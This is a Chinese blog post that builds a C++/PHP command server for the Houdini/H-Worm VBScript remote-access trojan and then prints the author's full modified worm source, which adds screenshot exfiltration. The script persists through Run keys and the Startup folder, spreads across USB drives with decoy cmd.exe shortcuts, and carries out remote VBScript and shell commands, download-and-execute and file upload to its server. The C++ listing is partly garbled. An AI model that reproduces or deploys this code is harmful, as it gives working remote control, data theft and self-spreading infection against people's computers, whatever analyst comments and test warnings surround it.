uzgbtymhqo.vbs服务器端测试代码编写

虽然是一个很小的vbs病毒(代码开头的标记表明它就是公开的 Houdini/H-Worm 远控脚本),但是功能也是足够齐全的:会下载上传文件,删除文件,枚举进程,查看系统相关的信息,更新木马,查看磁盘目录及目录下的文件,还能执行服务器下发的任意VBScript和cmd命令、结束进程,并通过在可移动磁盘上生成指向cmd.exe的.lnk快捷方式自我传播。
苦于没有服务器端,自己动手写了一个。
思路:用C++动态更新php文件内容,而php文件则作为客户端请求的响应脚本。如需执行命令只需在C++中输入即可。
运行界面:


服务器端目录如下:

主控php代码:(在is-ready/index.php下,即C++程序中dst所指向、客户端每次轮询请求的文件;is-recving/index.php则是接收客户端上传文件的脚本)

template.php主要目的是收集客户端的user-agent信息,而user-agent信息则被病毒修改为系统的信息,并保存在info.txt下。
最后info.txt内容是这样的:


template.php代码如下:

    
    

服务器端代码如下:
#include "fstream"
#include "iostream"
#include 
   
   
    
    
#define MAXLENGTH 256
#define COMMANDS_COUNT 13
using namespace std;
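// Returns the number of characters before the terminating NUL in `str`
// (a hand-rolled strlen used to size the fout.write calls below).
// A null pointer yields 0 instead of being dereferenced.
int length(char* str)
{
	if (!str)
		return 0;
	int i = 0;
	while (str[i])
	{
		i++;
	}
	return i;
}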
int _tmain(int argc, _TCHAR* argv[])
{
	string  dst="D:\\Documents\\Chapter1\\is-ready\\index.php";
	char* cmd=new char[MAXLENGTH];
	string example[COMMANDS_COUNT];
	for(int i=0;i
    
    
     
     shellobj.run \\\"calc\\\"\";";
	example[2]="echo \"exit-process<|>\\\"explorer.exe\\\"\";";
	example[3]="echo \"site-send<|>http://127.0.0.1:8080/download/test.jpg<|>xiao.jpg\";";
	example[4]="echo \"recv<|>E:\\Study\\Hack\\wooyun\\wooyun monthy -1.pdf\";";
	example[5]="echo \"enum-driver\";";
	example[6]="echo \"enum-faf<|>E:\\\\\";";
	example[7]="echo \"enum-process\";";
	example[8]="echo 'cmd-shell<|>net user Xiao  /delete';";
	example[9]="echo \"delete<|>E:\\Study\\Hack\\wooyun\\\\test.txt\";(这里两个斜杠是php下,\\\\t转义)";
	example[10]="echo \"sleep<|>5000\";";
	example[11]="echo uninstall;";
	cout<<"命令示例:"<
     
     
      
      10000",18);
			break;
		}
		fout.write("
      
      
     
     
    
    
   
   

最后,我在vbs上面加上了定时截图上传的功能。截图由python的PIL库来实现(实际中,机器都安装python了,应该也不会中这种弱智病毒的啦。。)
最后附上修改后的完整vbs病毒代码:
'<[ recoder : houdini (c) skype : houdini-fx ]>
' Analyst notes: this is the publicly known Houdini / H-Worm VBScript RAT with
' a screenshot add-on bolted on by the blog author. The comments below describe
' what the visible code does so defenders can build detections; the code itself
' is left byte-identical.

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

' C2 endpoint. Beacons go over plain HTTP (see post()); here it points at the
' author's local test server rather than a real C2.
host = "127.0.0.1"
port = 8080
' Directory the script copies itself into; falls back to %temp% below.
installdir = "%temp%"
' When true, install() hides files/folders on removable drives and drops
' same-named .lnk launchers next to them (USB-spreading behaviour).
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")

'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

' Persists under its own script name in installdir and the Startup folder.
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
' Field separator used in both directions of the C2 protocol ("<|>").
spliter = "<" & "|" & ">"
' Beacon interval in ms; the "sleep" command overrides it via eval().
sleep = 5000 
dim response
dim cmd
dim param
' Note: "info" is never read; the fingerprint cache in information() is the
' undeclared global "inf".
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
' Main beacon loop. instance() handles first-run marker / relocation, then the
' script POSTs to http://host:port/is-ready/index.php every `sleep` ms and
' dispatches on the first "<|>"-separated field of the reply body.
' There is no authentication or integrity check on that reply: anyone able to
' answer as the C2 host (DNS/ARP/proxy) gets arbitrary code execution.
' Global error suppression is commented out here, so an unhandled error in any
' helper without its own "on error resume next" terminates the script.
'on error resume next
instance
'msgbox("response")
while true

' Re-runs persistence and removable-drive spreading on every iteration.
install

response = ""
'execute<|>shellobj.run  ""
response = post ("is-ready","")
'msgbox(response)
cmd = split (response,spliter)
select case cmd (0)
case "execute"
      param = cmd (1)
	  'msgbox(param)
      ' Server-supplied VBScript is evaluated in this process.
      execute param
case "update"
      param = cmd (1)
      ' Overwrites its own installed file with server-supplied script, relaunches it, exits.
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
'		msgbox(cmd(1)&"  "&cmd(2))
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      ' eval() on a server-controlled string: another code-execution path, not just a number.
      sleep = eval (param)        
end select
' Blog author's addition: run the generated PIL screenshot helper hidden, then
' upload tmp.jpg under a timestamp name and delete it.
shellobj.run "python.exe " & chr(34) & installdir & "screencap.py" & chr(34),vbhide
wscript.sleep 500

set fs=wscript.createobject("scripting.filesystemobject") 

' tmp.jpg is resolved against this process's current directory, and
' screencap.py saves relative to python's cwd - the two must coincide.
if (fs.FileExists("tmp.jpg")) then 

set f=filesystemobj.getfile("tmp.jpg")
name=date&" "&time
name=replace(name,":","-")
name=replace(name,"/","-")
f.name=name&".jpg"
upload(name&".jpg")
filesystemobj.deletefile name&".jpg"

end if
wscript.sleep sleep

wend


sub install
' Spreading + persistence; called on every beacon iteration.
' For each ready removable drive (drivetype = 1) it copies this script to the
' drive root as hidden+system (attributes 2+4), marks every existing file and
' folder hidden+system, and drops a same-named .lnk per file/folder whose target
' is cmd.exe with "/c start <worm>&start <original>&exit". The .lnk borrows the
' original type's DefaultIcon from HKLM\software\classes so the decoy looks like
' the real item. lnkfile/lnkfolder (config) gate the two loops.
' All failures are swallowed by "on error resume next".
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

' Re-applies the Run keys and the installdir/Startup copies first.
upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    ' .lnk name = part of the file name before the first dot.
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    ' Spaces in names are wrapped in quotes so cmd's start parses them.
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        ' Folder decoys open the hidden folder in explorer after starting the worm.
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
' C2-triggered cleanup: removes the HKCU/HKLM Run values, the Startup copy and
' the running file, then on each removable drive un-hides files/folders and
' deletes the generated .lnk files and the worm copy. Leaves behind
' installdir\screencap.py and the HKLM\software\<scriptbasename> marker written
' by instance() - useful residue for forensics.
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
' After instance() relocation this is the installdir copy.
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     ' Deletes the .lnk that install() created for this file.
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 ' Any .lnk in the drive root is removed, including pre-existing ones.
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)
' Beacon/exfil primitive: synchronous HTTP POST of `param` to
' http://host:port/<cmd>/index.php with the victim fingerprint from
' information() in the User-Agent header; returns the response body.
' No TLS, no authentication. The header name carries a stray trailing colon
' ("user-agent:"); whether MSXML normalises it cannot be confirmed from here.
' The initial "post = param" is overwritten before the function returns.

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd&"/index.php", false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
' Builds (once) and caches the victim fingerprint sent in every User-Agent:
'   <hwid><|><computername><|><username><|><OS caption><|>plus<|><AV names><|><usbspreading><date><tab><time>
' The cache is the undeclared global "inf", so later calls return the value
' computed on the first call.
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    ' Fixed literal "plus" - a version/variant tag in the original family.
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
	inf = inf & date&"	"&time
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
' Persistence: Run values in HKCU and HKLM named after the script's base name,
' pointing at "wscript.exe //B <installdir>\<name>", plus copies of the script
' into installdir and the per-user Startup folder. The HKLM write needs admin;
' its failure is hidden by "on error resume next".
' Detection hint: a Run value launching wscript.exe //B from %temp%.
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
' Victim identifier: the volume serial number of the first Win32_LogicalDisk
' that reports a non-empty serial. Returns Empty if WMI fails.
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
' Enumerates installed AV products via WMI root\SecurityCenter (old OS) or
' root\SecurityCenter2 (osversion > 6) and returns their display names joined
' with " .", or "nan-av" when none are found. Feeds the User-Agent fingerprint.
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
' ".version" on the collection is not valid; the error is swallowed and
' versionstr keeps the value from the loop above.
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
' Bug: indexes with the undeclared "i" (Empty, which indexes as 0) instead of
' the loop variable x, so the major digit is repeated (e.g. "6.1.7601" becomes
' "6.66"). The "> 6" test below still appears to pick the right namespace.
	 osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
' Start-up gate: records a first-run marker, drops the screenshot helper,
' persists, relocates execution to the installdir copy and holds a handle on it.
on error resume next

' First-run marker under HKLM\software\<scriptbasename>: "true - <date>" when
' launched from a drive root (X:\<name>, i.e. via a removable drive), otherwise
' "false - <date>". Reported back inside the User-Agent fingerprint.
usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date&"  "
   else
      usbspreading = "false - " & date&"  "
   end if
   shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
end If

generateScreenCaptureCode
upstart

' If not already running from installdir, launch the installed copy and exit.
' The blog author launches it visibly for debugging; the commented //B form is the quiet one.
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
'msgbox(scriptfullnameshort.shortpath)
'msgbox(installfullnameshort.shortpath)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe  " & chr(34) & installdir & installname & Chr(34)  'for the finished build use: shellobj.run "wscript.exe  //B" & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
' Keeps the installed file open in append mode. This appears to double as a
' single-instance lock (a second copy fails the open and quits); the "update"
' command closes and rewrites the file through this handle.
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)
' Download-and-execute from an arbitrary URL: GETs fileurl, writes the body via
' a binary ADODB.Stream to installdir & filename, and runs it. filename is
' concatenated verbatim, so a value containing ".." or a drive path escapes
' installdir. No "on error resume next" - a failed GET raises to the caller.

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
		.type = 1 
		.open
		.write objhttpdownload.responsebody
		.savetofile strsaveto
		.close
   end with
   set objstreamdownload = nothing
end if
' Executes the dropped file by its 8.3 short path (avoids quoting issues).
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)
' Download-and-execute from the C2 itself: POSTs to
' http://host:port/is-sending<|><fileurl> (separator and path sent unencoded),
' saves the body under filedir (default installdir) using the part of fileurl
' after the last backslash, and runs it.

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
	set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
		 .type = 1 
		 .open
		 .write objhttpdownload.responsebody
		 .savetofile strsaveto
		 .close
	end with
    set objstreamdownload  = nothing
end if
' Executes the dropped file by its 8.3 short path.
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)
' Exfiltration: reads a local file as a binary ADODB.Stream and POSTs the raw
' bytes to http://host:port/is-recving/index.php?&filename=<part after last "\">.
' Also used by the main loop for screenshots. The local httpobj shadows the
' global one. The receiving PHP (not shown on this page) gets filename
' verbatim; it must not use it as a path without sanitising (e.g. "..").

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
	 .loadfromfile fileurl
	 buffer = .read
	 .close
end with
' Typo in the original: releases a name that was never set here; harmless.
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving/index.php?&filename="&mid (fileurl, instrrev (fileurl,"\") + 1) , false
httpobj.send buffer
end function


function enumdriver ()
' Drive inventory for the C2: one "<path><tab><drivetype><tab><free>GB<|>"
' entry per ready drive (tabs are literal inside the string literals).

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "	" & drive.drivetype & "	" & drive.freespace/(1024*1024*1024) & "GB" & spliter
end if
next
end Function
function enumfaf (enumdir)
' Directory listing for the C2: "<enumdir><|>" followed by "<name>||d|<attrs><|>"
' per subfolder and "<name>|<size>|f|<attrs><|>" per file.
' No error handling here, and the top-level "on error resume next" is commented
' out, so a non-existent enumdir raises and terminates the script.

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()
' Process listing via WMI Win32_Process: "<name>|<pid>|<executablepath><|>" per process.

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
	enumprocess = enumprocess & objitem.name & "|"
	enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
' Kills a process tree with "taskkill /F /T /PID <pid>" (window style 7,
' waits for completion). pid is the server-supplied string spliced into the
' command line unquoted - the sample already offers cmd-shell, so this adds no
' new capability, but it is another injection point worth logging.
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
' Deletes the given path, trying it first as a file and then as a folder;
' whichever call does not apply simply errors and is ignored.
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)
' Remote shell: runs "%comspec% /c <cmd>" with the server-supplied string
' spliced in verbatim and returns captured output. Only one stream is returned
' - stdout if it has data, otherwise stderr - so a command that writes both
' loses its stderr. ReadAll waits for the stream to close, so an interactive or
' long-running command stalls the beacon loop. The local httpobj is unused.

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function
sub generateScreenCaptureCode()
' Blog author's addition: (re)writes installdir\screencap.py, a three-line PIL
' script that grabs the screen and saves "tmp.jpg" relative to python's cwd.
' Mode 2 = overwrite, create = true. The file is not removed by uninstall().
a=2
set objFSO=createobject("Scripting.FileSystemObject")
set objTextFile=objFSO.OpenTextFile(installdir&"screencap.py",a,true)
objTextFile.writeline("from PIL import ImageGrab")
'objTextFile.writeline("import time")
'objTextFile.writeline("now=time.strftime('%Y-%m-%d %H-%M-%S',time.localtime(time.time()))")
objTextFile.writeline("im=ImageGrab.grab()")
objTextFile.writeline("im.save('tmp.jpg','jpeg')")
objTextFile.close
end sub
要测试请先在服务器端安装PHP,客户端安装Python和PIL库。注意:请只在隔离的虚拟机快照中测试,并且不要插入U盘——install过程会把脚本复制到每个可移动磁盘的根目录,把原有文件/文件夹设为隐藏并生成指向cmd.exe的同名.lnk;upstart会写入HKCU/HKLM的Run键和启动文件夹。而uninstall不会清理installdir下的screencap.py和HKLM\software\<脚本名>标记键,测试完请手动删除。
